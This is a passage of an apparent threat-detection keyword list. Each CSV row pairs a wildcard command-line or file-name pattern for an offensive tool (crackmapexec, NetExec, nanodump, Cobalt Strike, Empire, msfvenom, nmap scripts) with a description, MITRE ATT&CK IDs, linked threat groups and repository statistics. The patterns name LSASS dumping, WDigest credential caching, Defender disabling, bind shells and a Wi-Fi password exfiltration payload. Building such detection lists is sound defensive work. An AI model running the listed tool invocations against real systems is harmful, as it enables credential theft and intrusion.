/pvk:*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* ventrilo-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* versant-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vmauthd-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vmware-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vnc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vnc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vnc-title.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* voldemort-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vtam-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -vulnerable -stdout -hide-admins*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* vulners.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vulscan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* vuze-dht-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -w wordlist/*.txt*http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -watson -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* wdb-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --wdigest disable*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --wdigest enable*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* web-hacking-toolkit *,offensive_tool_keyword,web-hacking-toolkit,A web hacking toolkit Docker image with GUI applications support.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signedsecurity/web-hacking-toolkit,1,0,N/A,N/A,2,142,29,2023-01-31T10:11:30Z,2021-10-16T15:47:52Z -* weblogic-t3-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --werfault *\temp\*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* where /r C:\Windows\WinSxS\ *Microsoft.ActiveDirectory.Management.dll*,greyware_tool_keyword,where,threat actors searched for Active Directory related DLLs in directories,T1059 - T1083 - T1018,A0002 - TA0009 - TA0040,N/A,N/A,Discovery,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* whois-domain.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* whois-ip.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* winDefKiller *,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,0,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -* windows/csharp_exe*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* windows/shell/bind_tcp *,offensive_tool_keyword,msfvenom,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -* Windows-Passwords.ps1*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -* -winPEAS *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* winrm * -u * -p * --laps*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* winrm * -u * -p * -X whoami*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* winrm.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --wldp-bypass=*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -* --wmi *SELECT *,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* wmiexec.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --wmi-namespace 'root\cimv2'*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* wmirun=true dllpath=*.dll* computername=*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,0,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z -* -wordlist * -spawnto *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -* --wordlist=*.lst*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* -word-list-path * -file-extensions *,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,0,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -* -WorkingHours *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --wpad --lm --ProxyAuth --disable-ess**,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* WriteToLsass*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,0,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -* wsdd-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ws-dirs.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* ws-files.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* WSPCoerce.cs*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z -* -X '$PSVersionTable' *,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -X '[System.Environment]::Is64BitProcess'*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -X FUZZ http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -X whoami --obfs*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* x11-access.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* xdmcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* xmlrpc-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* xmpp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* xmpp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* xpipe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 